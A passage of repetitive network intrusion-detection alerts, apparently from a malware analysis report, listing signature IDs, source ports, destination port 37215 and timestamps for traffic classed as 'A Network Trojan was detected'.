          SID:2835222
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742128
          SID:2835222
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155901
          SID:2835222
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.798388
          SID:2835222
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732119
          SID:2835222
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599555
          SID:2835222
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601704
          SID:2829579
          Source Port:33152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805830
          SID:2835222
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460403
          SID:2835222
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704030
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446098
          SID:2829579
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352961
          SID:2835222
          Source Port:40822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274730
          SID:2829579
          Source Port:55542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787214
          SID:2829579
          Source Port:54882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261029
          SID:2829579
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442140
          SID:2835222
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706404
          SID:2829579
          Source Port:38610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741332
          SID:2835222
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191312
          SID:2835222
          Source Port:38094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912831
          SID:2829579
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546596
          SID:2835222
          Source Port:59812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114118
          SID:2829579
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038227
          SID:2835222
          Source Port:32900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351099
          SID:2835222
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037083
          SID:2829579
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302348
          SID:2829579
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396750
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512988
          SID:2835222
          Source Port:49804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891932
          SID:2829579
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263774
          SID:2829579
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599304
          SID:2835222
          Source Port:59790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355562
          SID:2829579
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598990
          SID:2835222
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038275
          SID:2835222
          Source Port:35336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173492
          SID:2835222
          Source Port:60662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734291
          SID:2829579
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807625
          SID:2829579
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797752
          SID:2829579
          Source Port:33942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511643
          SID:2835222
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469091
          SID:2829579
          Source Port:36198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113675
          SID:2835222
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155777
          SID:2829579
          Source Port:54450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738502
          SID:2835222
          Source Port:35896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884235
          SID:2829579
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262369
          SID:2829579
          Source Port:35224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895889
          SID:2829579
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180503
          SID:2835222
          Source Port:52734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275373
          SID:2829579
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262295
          SID:2829579
          Source Port:48660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738388
          SID:2835222
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015712
          SID:2829579
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897857
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404547
          SID:2829579
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136034
          SID:2829579
          Source Port:34786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402596
          SID:2835222
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465380
          SID:2835222
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460139
          SID:2829579
          Source Port:50768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241290
          SID:2829579
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262595
          SID:2829579
          Source Port:51424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306402
          SID:2835222
          Source Port:59270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827532
          SID:2829579
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449602
          SID:2829579
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465160
          SID:2829579
          Source Port:33900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020422
          SID:2835222
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075525
          SID:2835222
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709423
          SID:2835222
          Source Port:53464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846413
          SID:2835222
          Source Port:52220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462819
          SID:2829579
          Source Port:55448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021948
          SID:2835222
          Source Port:37152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351585
          SID:2829579
          Source Port:48554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601544
          SID:2829579
          Source Port:58412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268033
          SID:2835222
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294733
          SID:2829579
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306233
          SID:2835222
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276273
          SID:2829579
          Source Port:57126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788922
          SID:2835222
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151124
          SID:2829579
          Source Port:58010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709817
          SID:2829579
          Source Port:48650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468883
          SID:2835222
          Source Port:44798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.183502
          SID:2829579
          Source Port:50898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599714
          SID:2835222
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899275
          SID:2835222
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239030
          SID:2835222
          Source Port:45900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136200
          SID:2835222
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128764
          SID:2829579
          Source Port:59588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352600
          SID:2829579
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242844
          SID:2829579
          Source Port:55784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600036
          SID:2835222
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901905
          SID:2835222
          Source Port:54478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806369
          SID:2829579
          Source Port:34664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708903
          SID:2835222
          Source Port:50864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038061
          SID:2835222
          Source Port:58834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788820
          SID:2835222
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788430
          SID:2835222
          Source Port:44004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2829579
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351409
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129300
          SID:2835222
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709206
          SID:2835222
          Source Port:60224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191652
          SID:2829579
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160234
          SID:2829579
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2835222
          Source Port:50648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408705
          SID:2835222
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786586
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802555
          SID:2829579
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545630
          SID:2835222
          Source Port:48634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160434
          SID:2829579
          Source Port:34446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043707
          SID:2835222
          Source Port:54702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822338
          SID:2829579
          Source Port:33926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.117782
          SID:2829579
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128644
          SID:2835222
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471976
          SID:2829579
          Source Port:41332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668201
          SID:2835222
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782679
          SID:2835222
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462492
          SID:2835222
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861323
          SID:2835222
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160298
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512716
          SID:2829579
          Source Port:49528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549974
          SID:2829579
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158636
          SID:2829579
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747078
          SID:2835222
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518182
          SID:2835222
          Source Port:38246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548791
          SID:2835222
          Source Port:46572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707956
          SID:2835222
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467557
          SID:2829579
          Source Port:43506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860461
          SID:2829579
          Source Port:33708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273231
          SID:2829579
          Source Port:34836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021799
          SID:2829579
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466035
          SID:2835222
          Source Port:55310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189235
          SID:2829579
          Source Port:55064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789016
          SID:2835222
          Source Port:50882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407093
          SID:2835222
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792328
          SID:2829579
          Source Port:41382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552106
          SID:2829579
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306337
          SID:2829579
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861578
          SID:2835222
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130184
          SID:2829579
          Source Port:48902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513685
          SID:2829579
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302530
          SID:2835222
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157257
          SID:2835222
          Source Port:42684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407760
          SID:2829579
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824345
          SID:2835222
          Source Port:42438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743419
          SID:2829579
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731846
          SID:2835222
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394361
          SID:2835222
          Source Port:39668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456243
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462234
          SID:2835222
          Source Port:51582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.080337
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740183
          SID:2829579
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113891
          SID:2829579
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158897
          SID:2835222
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075741
          SID:2835222
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353174
          SID:2835222
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132108
          SID:2835222
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272065
          SID:2835222
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815567
          SID:2835222
          Source Port:41258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708744
          SID:2829579
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238143
          SID:2835222
          Source Port:44362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169454
          SID:2835222
          Source Port:49388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858999
          SID:2829579
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020271
          SID:2829579
          Source Port:46516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812782
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911524
          SID:2829579
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460842
          SID:2829579
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811575
          SID:2835222
          Source Port:33010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663754
          SID:2829579
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602939
          SID:2829579
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912428
          SID:2835222
          Source Port:45402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805754
          SID:2835222
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859506
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444390
          SID:2829579
          Source Port:45776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170596
          SID:2835222
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159016
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274033
          SID:2829579
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233556
          SID:2835222
          Source Port:40776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793295
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461934
          SID:2829579
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402100
          SID:2829579
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841876
          SID:2835222
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111134
          SID:2835222
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396249
          SID:2835222
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554162
          SID:2829579
          Source Port:36276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055550
          SID:2829579
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820889
          SID:2835222
          Source Port:45020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672909
          SID:2829579
          Source Port:38566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809039
          SID:2829579
          Source Port:50198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843889
          SID:2829579
          Source Port:52732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470374
          SID:2829579
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353545
          SID:2829579
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063068
          SID:2829579
          Source Port:49168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780920
          SID:2835222
          Source Port:47298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2835222
          Source Port:37080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911332
          SID:2835222
          Source Port:43680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407179
          SID:2829579
          Source Port:49104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546765
          SID:2835222
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747467
          SID:2835222
          Source Port:55512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460810
          SID:2835222
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464919
          SID:2835222
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672947
          SID:2835222
          Source Port:45300
          Destination Port:37215
